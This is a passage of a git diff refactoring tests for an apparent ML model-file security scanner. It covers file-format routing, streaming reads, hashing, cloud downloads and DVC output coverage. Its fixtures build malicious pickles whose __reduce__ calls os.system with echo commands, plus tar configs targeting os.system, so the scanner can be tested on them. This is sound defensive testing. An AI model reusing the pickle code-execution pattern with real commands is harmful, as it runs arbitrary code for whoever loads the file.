`.meta` files through strict protobuf parsing.""" - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") - - metagraph_path = tmp_path / "graph.meta" - metagraph_path.write_bytes(_build_tf_metagraph_bytes()) - - assert detect_format_from_extension(str(metagraph_path)) == "tf_metagraph" - assert detect_file_format(str(metagraph_path)) == "tf_metagraph" - assert detect_file_format_from_magic(str(metagraph_path)) == "tf_metagraph" - assert validate_file_type(str(metagraph_path)) is True + _assert_tf_metagraph_structure_routing(tmp_path, ("graph.meta"), ("tf_metagraph")) def test_detect_tf_metagraph_pb_suffix_validates_when_routed_by_content(tmp_path: Path) -> None: - if not _has_tf_protos(): - pytest.skip("TensorFlow protobuf stubs unavailable") - - metagraph_path = tmp_path / "graph.pb" - metagraph_path.write_bytes(_build_tf_metagraph_bytes()) - - assert detect_format_from_extension(str(metagraph_path)) == "protobuf" - assert detect_file_format(str(metagraph_path)) == "tf_metagraph" - assert detect_file_format_from_magic(str(metagraph_path)) == "tf_metagraph" - assert validate_file_type(str(metagraph_path)) is True + _assert_tf_metagraph_structure_routing(tmp_path, ("graph.pb"), ("protobuf")) def test_detect_tf_savedmodel_meta_suffix_validates_when_routed_by_content(tmp_path: Path) -> None: @@ -3854,16 +3750,7 @@ def test_detect_file_format_disguised_compressed_tar_by_content(tmp_path: Path) @pytest.mark.parametrize("config_name", ["model_config.yaml", "./model_config.yaml", "configs/../model_config.yaml"]) def test_detect_file_format_routes_renamed_nemo_archive_by_root_config(tmp_path: Path, config_name: str) -> None: - archive_path = tmp_path / "model.jpg" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo(config_name) - payload = b"model:\n _target_: os.system\n" - info.size = len(payload) - archive.addfile(info, io.BytesIO(payload)) - - assert detect_file_format(str(archive_path)) == "nemo" - assert detect_file_format_from_magic(str(archive_path)) == "nemo" - assert detect_file_format_for_skip_filter(str(archive_path)) == "nemo" + _assert_tar_config_routing(tmp_path, config_name, "model.jpg", "nemo") @pytest.mark.parametrize("link_type", [tarfile.SYMTYPE, tarfile.LNKTYPE]) @@ -4135,16 +4022,7 @@ def test_detect_file_format_routes_cyclic_root_config_symlink_for_fail_closed_sc ], ) def test_detect_file_format_keeps_non_root_config_names_on_tar_route(tmp_path: Path, config_name: str) -> None: - archive_path = tmp_path / "generic.jpg" - with tarfile.open(archive_path, "w") as archive: - info = tarfile.TarInfo(config_name) - payload = b"model:\n _target_: os.system\n" - info.size = len(payload) - archive.addfile(info, io.BytesIO(payload)) - - assert detect_file_format(str(archive_path)) == "tar" - assert detect_file_format_from_magic(str(archive_path)) == "tar" - assert detect_file_format_for_skip_filter(str(archive_path)) == "tar" + _assert_tar_config_routing(tmp_path, config_name, "generic.jpg", "tar") @pytest.mark.parametrize("link_type", [tarfile.SYMTYPE, tarfile.LNKTYPE]) @@ -4424,41 +4302,11 @@ def test_extensionless_llamafile_route_preempts_tflite_header_bytes(tmp_path: Pa def test_detect_file_format_routes_extensionless_xgboost_ubjson_by_structure(tmp_path: Path) -> None: - model_file = tmp_path / "model" - model_file.write_bytes( - b"{" - + _ubjson_key(b"learner") - + b"{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + b"}" - + _ubjson_key(b"version") - + b"[]" - + b"}" - ) - - assert detect_file_format(str(model_file)) == "xgboost" - assert detect_file_format_from_magic(str(model_file)) == "xgboost" - assert detect_file_format_for_skip_filter(str(model_file)) == "xgboost" + _assert_xgboost_ubjson_structure_routing(tmp_path, (b"{")) def test_detect_file_format_routes_extensionless_xgboost_ubjson_with_noop_before_learner(tmp_path: Path) -> None: - model_file = tmp_path / "model" - model_file.write_bytes( - b"{" - + _ubjson_key(b"learner") - + b"N{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + b"}" - + _ubjson_key(b"version") - + b"[]" - + b"}" - ) - - assert detect_file_format(str(model_file)) == "xgboost" - assert detect_file_format_from_magic(str(model_file)) == "xgboost" - assert detect_file_format_for_skip_filter(str(model_file)) == "xgboost" + _assert_xgboost_ubjson_structure_routing(tmp_path, (b"N{")) def test_extensionless_xgboost_route_preempts_incidental_tflite_identifier(tmp_path: Path) -> None: @@ -5558,3 +5406,70 @@ def test_hf_tokenizer_json_eof_proof_rejects_flat_deep_duplicate_and_invalid_utf b'{"version":"1.0","added_tokens":[],"model":{"type":"BPE","vocab":{"\xff":0},"merges":[]}}' ) assert file_detection._hf_tokenizer_json_eof_proves_ownership(invalid_utf8_path) is False + + +def _assert_xgboost_ubjson_structure_routing(tmp_path: Path, case_parameter_marker: bytes) -> None: + model_file = tmp_path / "model" + model_file.write_bytes( + b"{" + + _ubjson_key(b"learner") + + case_parameter_marker + + _ubjson_key(b"learner_model_param") + + b"{}" + + b"}" + + _ubjson_key(b"version") + + b"[]" + + b"}" + ) + + assert detect_file_format(str(model_file)) == "xgboost" + assert detect_file_format_from_magic(str(model_file)) == "xgboost" + assert detect_file_format_for_skip_filter(str(model_file)) == "xgboost" + + +def _assert_tf_metagraph_structure_routing(tmp_path: Path, case_filename: str, case_extension_format: str) -> None: + if not _has_tf_protos(): + pytest.skip("TensorFlow protobuf stubs unavailable") + + metagraph_path = tmp_path / case_filename + metagraph_path.write_bytes(_build_tf_metagraph_bytes()) + + assert detect_format_from_extension(str(metagraph_path)) == case_extension_format + assert detect_file_format(str(metagraph_path)) == "tf_metagraph" + assert detect_file_format_from_magic(str(metagraph_path)) == "tf_metagraph" + assert validate_file_type(str(metagraph_path)) is True + + +def _assert_generic_json_structure_unclaimed(tmp_path: Path, case_filename: str, case_prefix: str) -> None: + model_path = tmp_path / case_filename + model_path.write_text( + case_prefix + ",".join("0" for _ in range(5000)) + "]}", + encoding="utf-8", + ) + + assert detect_file_format(str(model_path)) == "unknown" + assert detect_file_format_from_magic(str(model_path)) == "unknown" + + +def _assert_tar_config_routing(tmp_path: Path, config_name: str, case_filename: str, case_expected_format: str) -> None: + archive_path = tmp_path / case_filename + with tarfile.open(archive_path, "w") as archive: + info = tarfile.TarInfo(config_name) + payload = b"model:\n _target_: os.system\n" + info.size = len(payload) + archive.addfile(info, io.BytesIO(payload)) + + assert detect_file_format(str(archive_path)) == case_expected_format + assert detect_file_format_from_magic(str(archive_path)) == case_expected_format + assert detect_file_format_for_skip_filter(str(archive_path)) == case_expected_format + + +def _assert_tokenizer_route_evidence(tmp_path: Path, case_late_fields: str, case_expected_jax: bool) -> None: + tokenizer_path = _write_ordered_hf_tokenizer_json( + tmp_path / "tokenizer.json", + late_fields=(case_late_fields), + ) + + assert is_huggingface_tokenizer_json_file(tokenizer_path) is False + assert file_detection.huggingface_tokenizer_json_has_template_route_evidence(tokenizer_path) is True + assert file_detection.huggingface_tokenizer_json_has_jax_route_evidence(tokenizer_path) is case_expected_jax diff --git a/tests/utils/file/test_streaming_analysis.py b/tests/utils/file/test_streaming_analysis.py index 89ad7d40a..a436ec2c3 100644 --- a/tests/utils/file/test_streaming_analysis.py +++ b/tests/utils/file/test_streaming_analysis.py @@ -696,14 +696,7 @@ def test_stream_analyze_file_bounds_negative_declared_size(monkeypatch: pytest.M def test_stream_analyze_file_marks_short_reads_incomplete(monkeypatch: pytest.MonkeyPatch) -> None: - _mock_stream_filesystem(monkeypatch, declared_size=8, payload=b"1234") - - result, was_complete = streaming.stream_analyze_file("file:///model.pkl", HeaderOnlyScanner(), max_bytes=8) - - assert result is not None - assert was_complete is False - assert result.metadata["bytes_analyzed"] == 4 - assert result.metadata["bytes_complete"] is False + _assert_streaming_short_read_metadata(monkeypatch, (8), (b"1234"), (8), (4)) def test_stream_analyze_file_detects_underreported_size_within_budget(monkeypatch: pytest.MonkeyPatch) -> None: @@ -721,14 +714,7 @@ def test_stream_analyze_file_detects_underreported_size_within_budget(monkeypatc def test_stream_analyze_file_detects_content_reported_as_empty(monkeypatch: pytest.MonkeyPatch) -> None: - _mock_stream_filesystem(monkeypatch, declared_size=0, payload=b"malicious payload") - - result, was_complete = streaming.stream_analyze_file("file:///model.pkl", HeaderOnlyScanner(), max_bytes=4) - - assert result is not None - assert was_complete is False - assert result.metadata["bytes_analyzed"] == 1 - assert result.metadata["bytes_complete"] is False + _assert_streaming_short_read_metadata(monkeypatch, (0), (b"malicious payload"), (4), (1)) def test_stream_analyze_file_confirms_reported_empty_content(monkeypatch: pytest.MonkeyPatch) -> None: @@ -746,14 +732,7 @@ def test_stream_analyze_file_confirms_reported_empty_content(monkeypatch: pytest def test_stream_analyze_file_fails_closed_when_declared_size_equals_budget( monkeypatch: pytest.MonkeyPatch, ) -> None: - _mock_stream_filesystem(monkeypatch, declared_size=4, payload=b"1234") - - result, was_complete = streaming.stream_analyze_file("file:///model.pkl", HeaderOnlyScanner(), max_bytes=4) - - assert result is not None - assert was_complete is False - assert result.metadata["bytes_analyzed"] == 4 - assert result.metadata["bytes_complete"] is False + _assert_streaming_short_read_metadata(monkeypatch, (4), (b"1234"), (4), (4)) def test_stream_analyze_file_returns_clean_partial_scanner_result( @@ -1058,3 +1037,22 @@ def fake_scan_stream( assert call_count == 1 assert analysis_complete is False assert result is not None + + +def _assert_streaming_short_read_metadata( + monkeypatch: pytest.MonkeyPatch, + case_declared_size: int, + case_payload: bytes, + case_max_bytes: int, + case_bytes_analyzed: int, +) -> None: + _mock_stream_filesystem(monkeypatch, declared_size=case_declared_size, payload=case_payload) + + result, was_complete = streaming.stream_analyze_file( + "file:///model.pkl", HeaderOnlyScanner(), max_bytes=case_max_bytes + ) + + assert result is not None + assert was_complete is False + assert result.metadata["bytes_analyzed"] == case_bytes_analyzed + assert result.metadata["bytes_complete"] is False diff --git a/tests/utils/helpers/test_secure_hasher.py b/tests/utils/helpers/test_secure_hasher.py index 8f38c291e..2dc140c83 100644 --- a/tests/utils/helpers/test_secure_hasher.py +++ b/tests/utils/helpers/test_secure_hasher.py @@ -135,39 +135,21 @@ def test_verify_hash_failure(self, tmp_path): def test_get_hash_info_secure(self): """Test parsing secure hash info.""" - hasher = SecureFileHasher() - hash_string = "secure:abcd1234ef567890" - - info = hasher.get_hash_info(hash_string) - - assert info["method"] == "full_hash" - assert info["algorithm"] == "blake2b" - assert info["security_level"] == "high" - assert info["hash"] == "abcd1234ef567890" + _assert_secure_hash_metadata( + ("secure:abcd1234ef567890"), ("full_hash"), ("blake2b"), ("high"), ("abcd1234ef567890") + ) def test_get_hash_info_fingerprint(self): """Test parsing fingerprint hash info.""" - hasher = SecureFileHasher() - hash_string = "fingerprint:1234abcd5678ef90" - - info = hasher.get_hash_info(hash_string) - - assert info["method"] == "enhanced_fingerprint" - assert info["algorithm"] == "blake2b" - assert info["security_level"] == "medium" - assert info["hash"] == "1234abcd5678ef90" + _assert_secure_hash_metadata( + ("fingerprint:1234abcd5678ef90"), ("enhanced_fingerprint"), ("blake2b"), ("medium"), ("1234abcd5678ef90") + ) def test_get_hash_info_unknown(self): """Test parsing unknown hash format.""" - hasher = SecureFileHasher() - hash_string = "unknown_format:hash_value" - - info = hasher.get_hash_info(hash_string) - - assert info["method"] == "unknown" - assert info["algorithm"] == "unknown" - assert info["security_level"] == "unknown" - assert info["hash"] == "unknown_format:hash_value" + _assert_secure_hash_metadata( + ("unknown_format:hash_value"), ("unknown"), ("unknown"), ("unknown"), ("unknown_format:hash_value") + ) class TestConvenienceFunctions: @@ -298,3 +280,17 @@ def test_integration_with_pickle_file(tmp_path): # Verify verification works assert hasher.verify_hash(str(pickle_file), result) is True + + +def _assert_secure_hash_metadata( + case_hash_string: str, case_method: str, case_algorithm: str, case_security_level: str, case_hash_value: str +) -> None: + hasher = SecureFileHasher() + hash_string = case_hash_string + + info = hasher.get_hash_info(hash_string) + + assert info["method"] == case_method + assert info["algorithm"] == case_algorithm + assert info["security_level"] == case_security_level + assert info["hash"] == case_hash_value diff --git a/tests/utils/sources/test_cloud_storage.py b/tests/utils/sources/test_cloud_storage.py index 1fa324b78..dc3c398f7 100644 --- a/tests/utils/sources/test_cloud_storage.py +++ b/tests/utils/sources/test_cloud_storage.py @@ -61,6 +61,33 @@ from tests.helpers import create_mock_coreml +async def mock_analyze(_url: str) -> dict[str, object]: + return { + "type": "file", + "size": 1024, + "name": "model.pt", + "human_size": "1.0 KB", + "estimated_time": "1 second", + } + + +def _optional_probe_failure_fs(payload: bytes, probe_failure: str) -> tuple[MagicMock, list[int]]: + transferred = [0] + open_count = [0] + fs = make_fs_mock() + fs.info.return_value = {"type": "file", "size": len(payload)} + + def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: + open_count[0] += 1 + if probe_failure == "prefix-extension" and open_count[0] == 3: + raise OSError("second ranged read is unavailable") + stream_type = _NoTailSeekCountingBytesIO if probe_failure == "size-proof" else _CountingBytesIO + return stream_type(payload, transferred) + + fs.open.side_effect = open_side_effect + return fs, transferred + + def make_fs_mock() -> MagicMock: fs = MagicMock() fs.__enter__.return_value = fs @@ -1846,17 +1873,7 @@ def test_filter_scannable_cloud_files_fails_closed_for_benign_near_match_without def test_filter_scannable_cloud_files_preserves_pickle_route_when_prefix_extension_fails() -> None: url = "s3://bucket/models/evil.payload" payload = make_incomplete_pickle_probe_payload(malicious=True) - transferred = [0] - open_count = [0] - fs = make_fs_mock() - - def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: - open_count[0] += 1 - if open_count[0] == 3: - raise OSError("second ranged read is unavailable") - return _CountingBytesIO(payload, transferred) - - fs.open.side_effect = open_side_effect + fs, transferred, open_count = _prefix_extension_failure_fs(payload) files = [{"path": url, "name": "evil.payload", "size": len(payload), "human_size": f"{len(payload)} B"}] assert _filter_scannable_cloud_files(files, fs=fs, max_sniff_bytes=len(payload)) == [ @@ -1869,17 +1886,7 @@ def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: def test_filter_scannable_cloud_files_fails_closed_for_benign_near_match_when_prefix_extension_fails() -> None: url = "s3://bucket/models/preview.payload" payload = make_incomplete_pickle_probe_payload(malicious=False) - transferred = [0] - open_count = [0] - fs = make_fs_mock() - - def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: - open_count[0] += 1 - if open_count[0] == 3: - raise OSError("second ranged read is unavailable") - return _CountingBytesIO(payload, transferred) - - fs.open.side_effect = open_side_effect + fs, transferred, open_count = _prefix_extension_failure_fs(payload) files = [{"path": url, "name": "preview.payload", "size": len(payload), "human_size": f"{len(payload)} B"}] with pytest.raises(ValueError, match="unable to inspect skipped object"): @@ -2318,19 +2325,7 @@ def test_selective_cloud_download_preserves_prefix_only_pickle_route_after_optio url = "s3://bucket/models/" file_url = "s3://bucket/models/evil.payload" payload = make_incomplete_pickle_probe_payload(malicious=True) - transferred = [0] - open_count = [0] - fs = make_fs_mock() - fs.info.return_value = {"type": "file", "size": len(payload)} - - def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: - open_count[0] += 1 - if probe_failure == "prefix-extension" and open_count[0] == 3: - raise OSError("second ranged read is unavailable") - stream_type = _NoTailSeekCountingBytesIO if probe_failure == "size-proof" else _CountingBytesIO - return stream_type(payload, transferred) - - fs.open.side_effect = open_side_effect + fs, transferred = _optional_probe_failure_fs(payload, probe_failure) mock_fs_class.return_value = fs mock_analyze.return_value = { "type": "directory", @@ -2374,19 +2369,7 @@ def test_selective_cloud_download_fails_closed_for_benign_near_match_after_optio url = "s3://bucket/models/" file_url = "s3://bucket/models/preview.payload" payload = make_incomplete_pickle_probe_payload(malicious=False) - transferred = [0] - open_count = [0] - fs = make_fs_mock() - fs.info.return_value = {"type": "file", "size": len(payload)} - - def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: - open_count[0] += 1 - if probe_failure == "prefix-extension" and open_count[0] == 3: - raise OSError("second ranged read is unavailable") - stream_type = _NoTailSeekCountingBytesIO if probe_failure == "size-proof" else _CountingBytesIO - return stream_type(payload, transferred) - - fs.open.side_effect = open_side_effect + fs, transferred = _optional_probe_failure_fs(payload, probe_failure) mock_fs_class.return_value = fs mock_analyze.return_value = { "type": "directory", @@ -3436,15 +3419,6 @@ def mock_get(remote_path: str, local_path: str, **_kwargs: object) -> None: fs.get.side_effect = mock_get - async def mock_analyze(_url: str) -> dict[str, object]: - return { - "type": "file", - "size": 1024, - "name": "model.pt", - "human_size": "1.0 KB", - "estimated_time": "1 second", - } - await asyncio.sleep(0) with ( patch("fsspec.filesystem", return_value=fs), @@ -3575,15 +3549,6 @@ async def test_download_from_cloud_streaming_async_context(tmp_path: Path) -> No fs.get.side_effect = lambda _src, dst: Path(dst).write_bytes(b"data") temp_dir = tmp_path / "streaming-tempdir" - async def mock_analyze(_url: str) -> dict[str, object]: - return { - "type": "file", - "size": 1024, - "name": "model.pt", - "human_size": "1.0 KB", - "estimated_time": "1 second", - } - await asyncio.sleep(0) with ( patch("fsspec.filesystem", return_value=fs), @@ -4288,16 +4253,7 @@ def test_download_plan_preserves_case_only_names_on_case_sensitive_filesystem(se {"path": f"{base_url}/model.pkl"}, ] - with ( - patch("modelaudit.utils.sources.cloud_storage._is_case_sensitive_directory", return_value=True), - patch( - "modelaudit.utils.sources.cloud_storage._is_unicode_normalization_sensitive_directory", - return_value=True, - ), - ): - plan = _build_cloud_download_plan(base_url, files, tmp_path) - - assert [local_path.name for _, _, local_path in plan] == ["Model.pkl", "model.pkl"] + _assert_distinct_cloud_names(tmp_path, base_url, files, True, "Model.pkl", "model.pkl") def test_download_plan_preserves_sharp_s_names_on_case_insensitive_filesystem(self, tmp_path: Path) -> None: base_url = "s3://bucket/models" @@ -4306,16 +4262,7 @@ def test_download_plan_preserves_sharp_s_names_on_case_insensitive_filesystem(se {"path": f"{base_url}/strasse.pkl"}, ] - with ( - patch("modelaudit.utils.sources.cloud_storage._is_case_sensitive_directory", return_value=False), - patch( - "modelaudit.utils.sources.cloud_storage._is_unicode_normalization_sensitive_directory", - return_value=True, - ), - ): - plan = _build_cloud_download_plan(base_url, files, tmp_path) - - assert [local_path.name for _, _, local_path in plan] == ["stra\u00dfe.pkl", "strasse.pkl"] + _assert_distinct_cloud_names(tmp_path, base_url, files, False, "stra\u00dfe.pkl", "strasse.pkl") @pytest.mark.parametrize( "paths", @@ -4370,16 +4317,7 @@ def test_download_plan_preserves_unicode_variants_on_normalization_sensitive_fil {"path": f"{base_url}/cafe\u0301.pkl"}, ] - with ( - patch("modelaudit.utils.sources.cloud_storage._is_case_sensitive_directory", return_value=True), - patch( - "modelaudit.utils.sources.cloud_storage._is_unicode_normalization_sensitive_directory", - return_value=True, - ), - ): - plan = _build_cloud_download_plan(base_url, files, tmp_path) - - assert [local_path.name for _, _, local_path in plan] == ["caf\u00e9.pkl", "cafe\u0301.pkl"] + _assert_distinct_cloud_names(tmp_path, base_url, files, True, "caf\u00e9.pkl", "cafe\u0301.pkl") @pytest.mark.parametrize( "relative_path", @@ -5701,3 +5639,37 @@ def test_filter_scannable_files_uses_registry_extensions(): def test_filter_scannable_files_handles_tar_gz_and_tgz(): files = [{"path": "archive.tar.gz"}, {"path": "weights.tgz"}] assert filter_scannable_files(files) == files + + +def _directory_or_metadata_error(url: str, /, path: str) -> dict[str, object]: + if path == url: + return {"type": "directory"} + raise PermissionError(f"metadata denied for {path}") + + +def _prefix_extension_failure_fs(payload: bytes) -> tuple[MagicMock, list[int], list[int]]: + transferred = [0] + open_count = [0] + fs = make_fs_mock() + + def open_side_effect(_path: str, _mode: str = "rb") -> _CountingBytesIO: + open_count[0] += 1 + if open_count[0] == 3: + raise OSError("second ranged read is unavailable") + return _CountingBytesIO(payload, transferred) + + fs.open.side_effect = open_side_effect + return fs, transferred, open_count + + +def _assert_distinct_cloud_names( + tmp_path: Path, base_url: str, files: list[dict[str, str]], case_sensitive: bool, first_name: str, second_name: str +) -> None: + with ( + patch("modelaudit.utils.sources.cloud_storage._is_case_sensitive_directory", return_value=case_sensitive), + patch( + "modelaudit.utils.sources.cloud_storage._is_unicode_normalization_sensitive_directory", return_value=True + ), + ): + plan = _build_cloud_download_plan(base_url, files, tmp_path) + assert [local_path.name for _, _, local_path in plan] == [first_name, second_name] diff --git a/tests/utils/sources/test_dvc_integration.py b/tests/utils/sources/test_dvc_integration.py index 62c31bdc0..1096908bf 100644 --- a/tests/utils/sources/test_dvc_integration.py +++ b/tests/utils/sources/test_dvc_integration.py @@ -23,11 +23,7 @@ resolve_dvc_file_status, resolve_dvc_file_with_metadata, ) - - -class _LateMaliciousPayload: - def __reduce__(self) -> tuple[Callable[[str], int], tuple[str]]: - return (os.system, ("echo c085",)) +from tests.helpers.file_creators import SystemCommandPayload def _write_incomplete_png_payload(path: Path) -> None: @@ -257,15 +253,9 @@ def test_missing_targets_ignored(self, tmp_path): def test_missing_dvc_outputs_mark_scan_incomplete_with_resolved_target(self, tmp_path: Path) -> None: """Missing declared DVC outputs should not be silently dropped.""" - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os - - return (os.system, ("echo dvc-existing-malicious",)) - existing = tmp_path / "existing_malicious.pkl" with existing.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload("echo dvc-existing-malicious"), f) missing = tmp_path / "hidden_payload.pkl" dvc_file = tmp_path / "partial.dvc" @@ -360,17 +350,11 @@ def test_resolved_dvc_outputs_remain_successful(self, tmp_path: Path) -> None: def test_partial_dvc_directory_output_scans_nested_payload(self, tmp_path: Path) -> None: """Resolved directories should still be traversed when another output is missing.""" - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os - - return (os.system, ("echo dvc-directory-malicious",)) - output_dir = tmp_path / "model" output_dir.mkdir() nested_payload = output_dir / "nested.pkl" with nested_payload.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload("echo dvc-directory-malicious"), f) dvc_file = tmp_path / "partial-directory.dvc" dvc_file.write_text("""outs: @@ -561,14 +545,7 @@ def test_escaping_dvc_file_symlink_marks_scan_incomplete( dvc_file.write_text("outs:\n- path: model\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(dvc_file), cache_scan_results=False) incomplete_issue = next( @@ -604,14 +581,7 @@ def test_project_scan_marks_dvc_file_symlink_escape_incomplete( dvc_file.write_text("outs:\n- path: model\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) incomplete_issue = next( @@ -669,14 +639,7 @@ def test_internal_dvc_file_symlink_does_not_create_coverage_gap( dvc_file.write_text("outs:\n- path: model\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(dvc_file), cache_scan_results=False) @@ -706,14 +669,7 @@ def test_dvc_file_symlink_covered_by_another_declared_output( dvc_file.write_text("outs:\n- path: model\n- path: linked-target\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(dvc_file), cache_scan_results=False) @@ -743,14 +699,7 @@ def test_dvc_file_symlink_covered_by_declared_file_output( dvc_file.write_text("outs:\n- path: model\n- path: payload.pkl\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(dvc_file), cache_scan_results=False) @@ -783,14 +732,7 @@ def test_dvc_file_symlink_next_to_declared_file_remains_uncovered( dvc_file.write_text("outs:\n- path: model\n- path: declared.pkl\n") scanned_paths: list[str] = [] - def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: - scanned_paths.append(path) - result = ScanResult(scanner_name="test") - result.bytes_scanned = Path(path).stat().st_size - result.finish(success=True) - return result - - monkeypatch.setattr(core_module, "scan_file", fake_scan_file) + _record_scanned_paths(monkeypatch, scanned_paths) result = scan_model_directory_or_file(str(dvc_file), cache_scan_results=False) incomplete_issue = next( @@ -1173,16 +1115,12 @@ def test_parent_directory_target_prevention(self, tmp_path: Path) -> None: def test_wdir_routes_to_declared_artifact_instead_of_decoy(self, tmp_path: Path) -> None: """DVC output paths must be resolved relative to the declared working directory.""" - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo dvc-wdir-malicious",)) - decoy = tmp_path / "model.pkl" decoy.write_bytes(pickle.dumps({"benign": True})) artifacts = tmp_path / "artifacts" artifacts.mkdir() payload = artifacts / "model.pkl" - payload.write_bytes(pickle.dumps(MaliciousClass())) + payload.write_bytes(pickle.dumps(SystemCommandPayload("echo dvc-wdir-malicious", lambda: os.system))) dvc_file = tmp_path / "model.dvc" dvc_file.write_text("wdir: artifacts\nouts:\n- path: model.pkl\n") @@ -1285,7 +1223,7 @@ def test_over_limit_dvc_scan_fails_closed_for_omitted_late_output(self, tmp_path late_malicious = tmp_path / "late_malicious.pkl" with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_lines.append(f"- path: {late_malicious.name}") dvc_file = tmp_path / "over_limit.dvc" @@ -1330,7 +1268,7 @@ def test_over_limit_dvc_with_security_finding_keeps_exit_code_1( monkeypatch.setattr("modelaudit.utils.sources.dvc.MAX_DVC_OUTPUTS", 1) malicious = tmp_path / "malicious.pkl" with malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) omitted = tmp_path / "omitted.pkl" with omitted.open("wb") as f: pickle.dump({"omitted": True}, f) @@ -1408,7 +1346,7 @@ def test_capped_dvc_scan_rejects_same_count_pointer_rewrite( with benign.open("wb") as f: pickle.dump({"ok": True}, f) with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_file = tmp_path / "rewritten.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 101) @@ -1487,7 +1425,7 @@ def test_cli_keeps_capped_pointer_rewritten_during_coverage( with benign.open("wb") as f: pickle.dump({"ok": True}, f) with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_file = tmp_path / "cli_rewritten.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 101) @@ -1537,7 +1475,7 @@ def test_duplicate_dvc_tail_cannot_hide_new_output_past_verification_window(self late_malicious = tmp_path / "late_malicious.pkl" with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_file = tmp_path / "duplicate_tail_padding.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 200 + f"- path: {late_malicious.name}\n") @@ -1562,7 +1500,7 @@ def test_duplicate_dvc_outputs_cannot_hide_unique_late_output(self, tmp_path: Pa late_malicious = tmp_path / "late_malicious.pkl" with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_file = tmp_path / "duplicate_padding.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 100 + "- path: late_malicious.pkl\n") @@ -1708,7 +1646,7 @@ def test_directory_scan_detects_malicious_omitted_output(self, tmp_path: Path) - late_malicious = tmp_path / "late_malicious.pkl" with late_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_lines.append(f"- path: {late_malicious.name}") dvc_file = tmp_path / "directory_over_limit_malicious.dvc" @@ -1737,7 +1675,7 @@ def test_dvc_directory_output_keeps_security_exit_when_nested_coverage_incomplet malicious = output_dir / "late_malicious.pkl" with malicious.open("wb") as handle: - pickle.dump(_LateMaliciousPayload(), handle) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), handle) incomplete = output_dir / "preview.png" _write_incomplete_png_payload(incomplete) @@ -1965,7 +1903,7 @@ def test_cli_security_finding_asset_counts_as_dvc_coverage(self, tmp_path: Path) from modelaudit.models import AssetModel, create_initial_audit_result malicious_path = tmp_path / "malicious.pkl" - malicious_path.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious_path.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) finding_result = create_initial_audit_result() finding_result.success = True finding_result.has_errors = True @@ -2591,7 +2529,7 @@ def test_cli_keeps_pointer_for_directory_with_unwalked_symlink_subtree(self, tmp real_dir.mkdir() malicious = real_dir / 